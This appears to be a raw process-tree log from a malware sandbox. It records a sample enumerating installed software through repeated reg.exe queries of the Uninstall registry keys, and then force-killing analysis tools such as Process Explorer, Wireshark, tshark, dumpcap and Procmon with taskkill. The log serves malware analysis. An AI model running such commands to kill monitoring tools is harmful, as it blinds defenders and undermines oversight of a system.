C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1848
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:648
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1980
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1648
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:320
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1896
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1580
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1424
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1532
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1184
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1256
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:680
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:748
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:240
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1820
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:796
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:624
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1932
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1940
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1884
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1952
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1080
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1916
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1912
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1520
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1828
-